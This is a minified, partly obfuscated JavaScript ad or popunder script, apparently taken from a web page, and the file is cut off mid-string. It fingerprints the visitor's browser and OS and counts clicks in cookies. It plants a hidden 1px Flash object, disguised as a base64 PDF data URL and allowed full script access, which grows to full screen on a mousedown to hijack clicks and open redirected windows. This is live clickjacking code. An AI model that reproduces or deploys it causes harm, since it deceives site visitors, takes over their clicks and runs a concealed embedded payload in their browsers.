try { function pokeUp(teasers) { var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; }; var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } } if (are_cookies_enabled()) { run(); } var website = teasers[0][0]; function are_cookies_enabled() { var cookieEnabled = navigator.cookieEnabled ? true : false; if (typeof navigator.cookieEnabled == "undefined" && !cookieEnabled) { document.cookie = "testcookie"; cookieEnabled = document.cookie.indexOf("testcookie") != -1 ? true : false; } return cookieEnabled; } function inIframe() { try { return window.self !== window.top; } catch (e) { return true; } }; var compareElementsWithParentsToSelectors = function compareElementsWithParentsToSelectors(element_list, element_selectors) { var getParents = function getParents(elem) { var parents = []; for (; elem && elem !== document; elem = elem.parentNode) { parents.push(elem); } return parents; }; for (var i = 0; i < element_list.length; i++) { if (compareElementsToSelectors(getParents(element_list[i]), element_selectors)) { return true; }; }; return false; }; var compareElementsWithChildrenToSelectors = function compareElementsWithChildrenToSelectors(element_list, element_selectors) { var getChildren = function getChildren(elem) { var children = Array.from(elem.querySelectorAll("*")); children.push(elem); return children; }; for (var i = 0; i < element_list.length; i++) { if (compareElementsToSelectors(getChildren(element_list[i]), element_selectors)) { return true; } }; return false; }; var compareElementsToSelectors = function compareElementsToSelectors(element_list, element_selectors) { for (var a = 0; a < element_selectors.length; a++) { for (var i = 0; i < element_list.length; i++) { match = element_list[i].matches(element_selectors[a]); if (match) return true; } }; return false; }; var Browser = function () { function Browser() { _classCallCheck(this, Browser); var browserdata = this.detectBrowser(); this.browser = browserdata[0]; this.version = browserdata[1]; this.OS = this.detectOS(); } _createClass(Browser, [{ key: "detectBrowser", value: function detectBrowser() { try { if (!!window.opr && !!opr.addons || !!window.opera || navigator.userAgent.indexOf(' OPR/') >= 0) { if (navigator.userAgent.match(/(opera)\/?\s*(\d+)/i) || navigator.userAgent.match(/(opr)\/?\s*(\d+)/i)) var version = navigator.userAgent.match(/(opera)\/?\s*(\d+)/i) || navigator.userAgent.match(/(opr)\/?\s*(\d+)/i); return ["opera", version[2]]; }; if (navigator.userAgent.search(/YaBrowser/) > 0) { var version = navigator.userAgent.match(/(yabrowser)\/?\s*(\d+)/i)[2]; return ["yandex", version]; }; if (typeof InstallTrigger !== 'undefined') { var version = navigator.userAgent.match(/(firefox)\/?\s*(\d+)/i)[2]; return ["firefox", version]; }; if (/constructor/i.test(window.HTMLElement) || function (p) { return p.toString() === "[object SafariRemoteNotification]"; }(!window['safari'] || typeof safari !== 'undefined' && safari.pushNotification) || !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/)) { var version = navigator.userAgent.match(/(version)\/?\s*(\d+)/i)[2]; return ["safari", version]; }; if (false || !!document.documentMode) { var version; var ua = window.navigator.userAgent; if (ua.indexOf("Trident/7.0") > -1) version = "11";else if (ua.indexOf("Trident/6.0") > -1) version = "10";else if (ua.indexOf("Trident/5.0") > -1) version = "9";else version = "8"; return ["ie", version]; }; if (!!window.StyleMedia) { var version = navigator.userAgent.match(/(edge)\/?\s*(\d+)/i)[2]; return ["edge", version]; }; if (!!window.chrome && (!!window.chrome.webstore || !!window.chrome.csi)) { var version = navigator.userAgent.match(/(chrome)\/?\s*(\d+)/i)[2]; return ["chrome", version]; }; } catch (e) { return "other"; }; return "other"; } }, { key: "detectOS", value: function detectOS() { var userAgent = window.navigator.userAgent, platform = window.navigator.platform, macosPlatforms = ['Macintosh', 'MacIntel', 'MacPPC', 'Mac68K'], windowsPlatforms = ['Win32', 'Win64', 'Windows', 'WinCE'], iosPlatforms = ['iPhone', 'iPad', 'iPod'], os = null; if (macosPlatforms.indexOf(platform) !== -1) { return 'macos'; } else if (iosPlatforms.indexOf(platform) !== -1) { return 'ios'; } else if (windowsPlatforms.indexOf(platform) !== -1) { return 'windows'; } else if (/Android/.test(userAgent)) { return 'android'; } else if (!os && /Linux/.test(platform)) { return 'linux'; } return os; } }, { key: "getBrowser", value: function getBrowser() { return this.browser; } }, { key: "getVersion", value: function getVersion() { return this.version; } }, { key: "getOS", value: function getOS() { return this.OS; } }]); return Browser; }(); ; var browser = new Browser(); function run() { window.main = new function () { count_to_cookie(); system = { 'window': null, '_handle': null, 'clicked_url': null }; if (typeof self.window === "undefined") { _parent = window; } else { _parent = self; } var var_1 = 2, var_2 = 0, var_3 = null, some_list = [[1, 28800]], hours = 24, var_4 = "", var_5 = "", querystring = '', var_6 = 100, logging = true, var_8 = true, var_9 = false, var_11 = false, fl = {}; function nowdate_plus_hours(hours) { var now = new Date(); var time = now.getTime(); time += 1000 * 3600 * hours; now.setTime(time); var cookie_expires = now.toUTCString(); return cookie_expires; } function iterate_counter(index) { cookie_expires = nowdate_plus_hours(12); var statistics = JSON.parse(getCookie('uu_count')); statistics[index] += 1; new_statistics = JSON.stringify(statistics); setCookie("uu_count", new_statistics, cookie_expires); if(statistics[index] < 3) { t2_e4719dd21a = getCookie('t2_e4719dd21a'); if(t2_e4719dd21a < 3) { setCookie('u2_e4719dd21a', 0, nowdate_plus_hours(0)); setCookie('t2_e4719dd21a', t2_e4719dd21a+1 , nowdate_plus_hours(0)); } } } function count_to_cookie() { cookie_expires = nowdate_plus_hours(12); document.onclick = function (e) { if (e.isTrusted) { iterate_counter(0); } }; if (getCookie("uu_count") != false) { var statistics = JSON.parse(getCookie('uu_count')); } else { var statistics = [0, 0]; var json_satistics = JSON.stringify(statistics); console.log("set cookie uu_count"); setCookie("uu_count", json_satistics, cookie_expires); } } function _2997726831837() { if (something) { return; } cur_time = new Date().getTime(); wait_start = getCookie('2_997726831851'); if (var_2 != 0 && (!wait_start || wait_start > cur_time)) { return; } var some_list = _997726831824(_997726831814); _997726831838 = getCookie('t2_e4719dd21a'); _997726831831 = 0; some_list.sort(_997726831819); while (some_list.length > 0) { _997726831831 = _99772683180(some_list); if (_997726831831[0] > _997726831838) break; } if (!_997726831838) { _997726831838 = 0; } if (some_list.length == 0 && _997726831831[0] <= _997726831838) { _997726831838 = 0; some_list = _997726831824(_997726831814); some_list.sort(_997726831819); _997726831831 = _99772683180(some_list); } if (_997726831838 == _997726831831[0] - 1) { var _997726831832 = getCookie('u2_e4719dd21a'); if (!_997726831832) { _997726831832 = 0; } log_print('Current click: ' + _997726831838); if (_997726831832 != 0 && _997726831832 > cur_time) { return; } log_print('Preloading init'); _99772683189(); } } var ePC = { obm: [], LrrDpe: function LrrDpe() { if (ePC && ePC.obm && ePC.obm.length) { for (var i = 0; i < ePC.obm.length; i++) { if (typeof ePC.obm[i] === 'function') { ePC.obm[i](); } } ePC.obm = []; } }, UUnKCvf: function UUnKCvf(obj, evt, fnc, useCapture) { if (typeof useCapture == 'undefined') { useCapture = false; } if (obj.addEventListener) { obj.addEventListener(evt, fnc, useCapture); return true; } else if (obj.attachEvent) { return obj.attachEvent('on' + evt, fnc); } else { evt = 'on' + evt; if (typeof obj[evt] === 'function') { fnc = function (f1, f2) { return function () { f1.apply(this, arguments); f2.apply(this, arguments); }; }(obj[evt], fnc); } obj[evt] = fnc; return true; } } }; function lst(obj, evt, fnc, useCapture) { if (typeof useCapture == 'undefined') { useCapture = false; } if (obj.addEventListener) { obj.addEventListener(evt, fnc, useCapture); return true; } else if (obj.attachEvent) { return obj.attachEvent('on' + evt, fnc); } else { evt = 'on' + evt; if (typeof obj[evt] === 'function') { fnc = function (f1, f2) { return function () { f1.apply(this, arguments); f2.apply(this, arguments); }; }(obj[evt], fnc); } obj[evt] = fnc; return true; } } var aviiPmx = function aviiPmx(url) { this.hasworked = false; this.url = url; this.jjwtB = 'toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1'; this._object = null; this._clb = null; var self = this; this.LdZSBi(); ePC.obm.push(function () { self._close(); }); }; aviiPmx.prototype = { _close: function _close() { this._clb && ePC.PgV(document, "mousedown", this._clb); this._object && this._object.parentNode && this._object.parentNode.removeChild(this._object); ROFkeiPN._close(); }, LdZSBi: function LdZSBi() { var self = this; self.jjwtB = "toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width=" + (window.outerWidth || 1000) + ",height=" + (window.outerHeight || 1000) + ",screenX=0,screenY=0"; var e = document.createElement("object"); e.setAttribute("type", "application/x-shockwave-flash"); e.setAttribute("id", "infCP"); e.setAttribute("name", "infCP"); e.setAttribute("data", "data:application/pdf;base64,Q1dTCZgCAAB4nFVS/26bMBA+28CFhPygSWjXrdKk/TtF7Am2itItUlKq0kj9LzhgFjYEVaBJ9zZ7k74Cb5QZkmrbybK/++7z3Vm+Z1CXAP3fAAaBK7MFAA7d7/cv446EBPxQZOL9J4CX0TdaE9IGMKmPd6Bs8yQy4pQX64nYiqws2vP8qRBujdtOmoQ/n7JIbLoHSZQUjyn/pfmPm6QULExXalHy76I19xa+u1zcDngUNXdnSVHKupueX8f9kKdinkdCdx8unfvl9fReL145s5FcHVJLXIrO9WI2W/rOneveGNE/gd6x0+dSbDKemu4RTDN5xjwUF7ski/Ld5DaLNk7abKuJv4udLJJIkSVT7ca7m1/ONG/1Q4Rlv+m2Ls7LcC0feuzjEDWbxDwsk604MNZ/cSfPSp7IZ2oWsZilnanWCZwioUgVJCoyRKWFREfSRtJBZiDpIukh6yMZIDFRHSIZI7GQnCI9Q/YG2TmytwocjRD6ipiiK9JXCdS/yKRPoCZaOqvsrw2lt88ru5pCoAU0xipWvRaVWI/bvCMVlNJGISkj7vJe0P848gakcU3ekwpGZb4PlS0gOLGDoR2M7GBsB5YdKHI9wEVjayaln4d9OEzT3ymBL9L9A+grnY4="); e.setAttribute("style", "position:fixed;visibility:visible;left:0;top:0;width:1px;height:1px;z-index:2147483638"); self.FlashElem = e; var v = document.createElement("param"); v.setAttribute("name", "wmode"); v.setAttribute("value", "transparent"); e.appendChild(v); var k = document.createElement("param"); k.setAttribute("name", "menu"); k.setAttribute("value", "false"); e.appendChild(k); var a = document.createElement("param"); a.setAttribute("name", "allowscriptaccess"); a.setAttribute("value", "always"); e.appendChild(a); var p = document.createElement("param"); p.setAttribute("name", "allowfullscreen"); p.setAttribute("value", "true"); e.appendChild(p); p = document.createElement("param"); p.setAttribute("name", "autoplay"); p.setAttribute("value", "true"); e.appendChild(p); var interval = setInterval(function () { if (!e) { return clearInterval(interval); } var style = "position:fixed !important;visibility:visible !important;left:0 !important;top:0 !important;width:1px !important;height:1px !important;z-index:2147483647 !important;overflow:hidden !important;"; e.style.visibility = 'hidden'; e.style.width = 0; e.style.height = 0; e.setAttribute('style', style); }, 100); self._object = e; var b = setInterval(function () { if (document.body) { clearInterval(b); self._clb = function (g) { if (g.button === 0) { clearInterval(interval); self.MousePosX = g.clientX; self.MousePosY = g.clientY; self.FlashElem.style.width = "100%"; self.FlashElem.style.height = "100%"; } }; document.body.insertBefore(e, document.body.firstChild); e.focus(); if (!getCookie('u2_e4719dd21a')) { lst(document, "mousedown", function (event) { if (self.hasworked == false) { var target = event.target.tagName.toLowerCase() || event.srcElement.tagName.toLowerCase(); if (target == "a" && event.target.getAttribute("target") != "_blank" && event.button == "0") { setTimeout(function () { event.target.click(); }, 300); } self._clb(event); } }); } } }, 10); }, SwfCndClb: function SwfCndClb() { var self = this; var pdf = function pdf(wnd) { function e() { if (self.hasworked == false) { wnd.resizeTo(f[1], f[0]); wnd.moveTo(f[2], f[3]); wnd.location.href = k; self.hasworked = true; setCookie("u2_e4719dd21a", "1"); setCookie("t2_e4719dd21a", "1"); iterate_counter(1); } } var b = window.screen.availHeight, c = window.screen.availWidth; var f = [b, c, Math.round((screen.height - b) / 2), Math.round((screen.width - c) / 2)]; wnd.document.write("